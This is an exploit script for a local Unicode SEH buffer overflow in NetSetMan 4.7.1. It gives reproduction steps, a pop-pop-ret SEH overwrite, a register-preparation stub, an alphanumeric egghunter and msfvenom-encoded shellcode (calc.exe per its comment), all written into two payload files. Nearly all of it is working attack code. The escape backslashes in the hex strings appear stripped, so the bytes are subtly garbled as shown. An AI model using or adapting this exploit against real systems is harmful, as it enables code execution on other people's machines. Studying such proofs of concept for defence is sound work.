#Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)
#Exploit Author: Devin Casadey
#Discovery Date: 2019-03-11
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows XP SP3

#-------------------------------------------------------------------------------

#Steps to replicate:
#1. Run the Python code below which outputs two payload .txt files.
#2. Open NetSetMan
#3. Enable "Workgroup" for both the "[Double Click!]" tab and "SET1" tab
#4. Paste contents of "payload2.txt" into the "Workgroup" field in the "SET1" tab.
#5. Paste contents of "payload1.txt" into the "Workgroup" field in the "[Double Click!]" tab.
#6. Click "Activate"
#7. ...
#8. Profit

#This is a Unicode SEH overflow, but the buffer is too small for a Unicode-encoded reverse shell payload.
#Therefore, an egghunter is used to locate an alphanumerically encoded payload stored elsewhere in memory.

#-------------------------------------------------------------------------------

# msfvenom -p windows/exec cmd=calc.exe -b "x00" -e x86/alpha_mixed -f python
#-v shellcode EXITFUNC=seh BufferRegister=EDI
#Payload size: 440 bytes
# PoC generator. The script's only runtime effect is writing two text files
# (payload1.txt, payload2.txt) into the current working directory; the
# application itself is exercised manually per the steps in the header.

# --- Stage 2: egg tag + alphanumeric-encoded payload (goes to payload2.txt) ---
# The egghunter defined further down searches memory for the "w00tw00t" tag
# and, per the header, hands control to the encoded bytes that follow it.
shellcode = ""  # dead assignment: immediately overwritten on the next line
shellcode = "w00tw00t"  # egg tag (8 bytes), searched for by the egghunter
shellcode += "x57x59x49x49x49x49x49x49x49x49x49x49"
shellcode += "x49x49x49x49x49x49x37x51x5ax6ax41x58"
shellcode += "x50x30x41x30x41x6bx41x41x51x32x41x42"
shellcode += "x32x42x42x30x42x42x41x42x58x50x38x41"
shellcode += "x42x75x4ax49x69x6cx59x78x6dx52x57x70"
shellcode += "x43x30x75x50x53x50x6cx49x49x75x36x51"
shellcode += "x39x50x71x74x6cx4bx56x30x46x50x4ex6b"
shellcode += "x71x42x46x6cx4ex6bx76x32x57x64x6ex6b"
shellcode += "x44x32x34x68x76x6fx6dx67x43x7ax71x36"
shellcode += "x44x71x6bx4fx6ex4cx57x4cx65x31x33x4c"
shellcode += "x47x72x36x4cx75x70x6fx31x5ax6fx34x4d"
shellcode += "x67x71x39x57x48x62x4ax52x43x62x46x37"
shellcode += "x6cx4bx32x72x32x30x6cx4bx71x5ax45x6c"
shellcode += "x6ex6bx70x4cx32x31x73x48x4ax43x63x78"
shellcode += "x56x61x6ex31x56x31x6ex6bx30x59x57x50"
shellcode += "x35x51x79x43x6cx4bx72x69x55x48x4dx33"
shellcode += "x46x5ax52x69x4ex6bx77x44x6ex6bx76x61"
shellcode += "x68x56x75x61x6bx4fx6cx6cx59x51x78x4f"
shellcode += "x66x6dx77x71x4bx77x30x38x6dx30x51x65"
shellcode += "x58x76x53x33x43x4dx69x68x67x4bx73x4d"
shellcode += "x67x54x50x75x4bx54x62x78x4cx4bx73x68"
shellcode += "x76x44x57x71x68x53x71x76x6ex6bx56x6c"
shellcode += "x72x6bx6ex6bx43x68x47x6cx66x61x6ex33"
shellcode += "x6ex6bx76x64x6cx4bx36x61x6ax70x6dx59"
shellcode += "x31x54x76x44x66x44x63x6bx61x4bx65x31"
shellcode += "x51x49x50x5ax73x61x59x6fx79x70x51x4f"
shellcode += "x71x4fx43x6ax4ex6bx55x42x5ax4bx4cx4d"
shellcode += "x73x6dx61x7ax37x71x6cx4dx6cx45x58x32"
shellcode += "x55x50x45x50x43x30x36x30x52x48x64x71"
shellcode += "x6cx4bx32x4fx4ex67x59x6fx79x45x4fx4b"
shellcode += "x6bx4ex56x6ex75x62x48x6ax65x38x6fx56"
shellcode += "x4ax35x6dx6dx6fx6dx6bx4fx68x55x75x6c"
shellcode += "x53x36x43x4cx36x6ax4bx30x4bx4bx6dx30"
shellcode += "x34x35x77x75x4fx4bx62x67x64x53x30x72"
shellcode += "x72x4fx30x6ax53x30x43x63x4bx4fx68x55"
shellcode += "x42x43x30x61x70x6cx31x73x44x6ex30x65"
shellcode += "x32x58x51x75x55x50x41x41"

# --- Stage 1 components (assembled into `buffer`, written to payload1.txt) ---
# Egghunter: Unicode-compatible search stub that locates the egg tag above.
# It is kept separate from the SEH overwrite because, per the header, the
# overflowed field is too small to hold the full payload directly.
egghunter =(
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIA"
"IAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30A"
"PB944JBC6SQGZKOLO0B0RQZOSR88MNNOLKUPZSDJO6XT7NPNP3DTKKJ6OD5JJ"
"6OBUK7KOYWLJA"
)

# Register-preparation stub executed after the SEH handler fires; the
# interleaved "nop/align" bytes keep the Unicode-expanded stream aligned
# (per-instruction comments are the author's).
regPrep = (
"x63" #nop/align
"x55" #push ebp
"x62" #nop/align
"x58" #pop eax
"x62" #nop/align
"x05x14x11" #add eax, 0x11001400
"x62" #nop/align
"x2dx13x11" #sub eax, 0x11001300
"x62" #nop/align
"x50" #push eax
"x62" #nop/align
"xc3") #ret

# Layout of payload1.txt: filler up to the SEH record, then the handler
# overwrite, then the stub and egghunter.
buffer = ""
buffer += "x61" * 75 #junk (distance to the SEH record for this field)
buffer += "x62" * 1 #nop

#0x00590058 : pop ebx # pop ebp # ret 0x08 | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [netsetman.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.7.1.0 (C:Program FilesNetSetMan etsetman.exe)
# Defender note: the fixed address above is only usable because the module
# reports no ASLR, no rebase and no SafeSEH; linking with /SAFESEH and
# /DYNAMICBASE would remove this static pop-pop-ret target.
buffer += "x58x59" #SEH overwrite to pop-pop-ret instruction
buffer += regPrep
buffer += "x62" * 108 #offset to egghunter
buffer += egghunter

#Write initial SEH overflow payload + egghunter with venetian shellcode
# Side effect: creates/overwrites payload1.txt in the CWD (text mode 'w').
f = open('payload1.txt','w')
f.write(buffer)
f.close()

#Egg + alphanumeric encoded shellcode payload
# Side effect: creates/overwrites payload2.txt in the CWD (text mode 'w').
g = open('payload2.txt', 'w')
g.write(shellcode)
g.close()